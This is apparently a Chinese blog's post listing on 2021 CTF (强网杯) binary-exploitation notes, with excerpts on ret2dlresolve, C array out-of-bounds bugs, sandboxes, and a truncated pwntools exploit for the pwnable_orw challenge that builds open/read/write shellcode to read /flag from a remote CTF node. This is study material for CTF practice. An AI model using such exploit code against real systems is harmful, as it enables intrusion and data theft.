2021年强网杯归纳
彬彬有礼am_03
这个作者很懒,什么都没留下…
展开
-
ret2dlresolve归纳
ret2dl_resolve的原理:动态链接相关函数_dl_runtime_resolve(link_map_obj, reloc_index)功能:在第一次调用某函数时运行,绑定其地址到对应的GOT表项第一个参数link_map_obj一直为GOT[1]的地址第二个参数reloc_index为被绑定函数在.rel.plt段里的相对偏移原理:1.调用_dl_runtime_resolve,修改reloc_index,令其指向伪造在栈里的重定向表表项2.- 伪造重定向表表项,修改第二项里符号表索原创 2021-09-02 11:26:13 · 246 阅读 · 0 评论 -
C语言数组下标越界
数组越界的严重性在 C 语言里,数组需为静态的。数组的大小需要在程序运行前就确定下来。C语言数组越界的严重性在于对数组元素访问及修改的内容存在不确定性。这类没有预知性的修改会导致无法确定的错误,发生缓冲区泄露漏洞。这也就是数组越界的严重所在。代码如下所示:数组里的下标从0开始。那么在上面代码只能访问:a[1]、a[2]、a[3]、a[4]、a[5]、a[6]、a[7]、a[8]、a[9]i自加到10时,a[10]属于数组下标越界。详细分析图1、栈把内存分配给数组,并且自上而下从小地址开原创 2021-09-01 00:02:15 · 1378 阅读 · 0 评论 -
shellcraft新姿势
pwnable_orwexp 脚本这道题的难度在于只能调用 open read 和 write ,学到了 shellcraft 新的使用方式from pwn import *io = remote(‘node3.buuoj.cn’,25539)context.binary = ‘orw’elf = ELF(‘orw’)shellcode = shellcraft.open(’/flag’)shellcode += shellcraft.read(‘eax’,‘esp’,100)shellc原创 2021-09-01 00:02:26 · 1338 阅读 · 1 评论 -
沙盒相关简介
沙盒沙盒(英语:sandbox,又译为沙箱),计算机专业术语,在计算机安全领域里是一类安全机制,为运行的程序提供的隔离环境。通常是作为一些来源不可信、具破坏力或无法判定程序意图的程序提供实验之用。沙盒通常严格控制其里的程序所能访问的资源,比如,沙盒可以提供用后即回收的磁盘及内存空间。在沙盒里,网络访问、对真实系统的访问、对输入设备的读取通常被禁止或是严格限制。从这个角度来说,沙盒属于虚拟化的一类。沙盒里的所有改动对操作系统不会造成任何损失。通常,这类技术被计算机技术人员广泛用于测试可能带毒的程序或是其原创 2021-09-01 00:02:35 · 1719 阅读 · 0 评论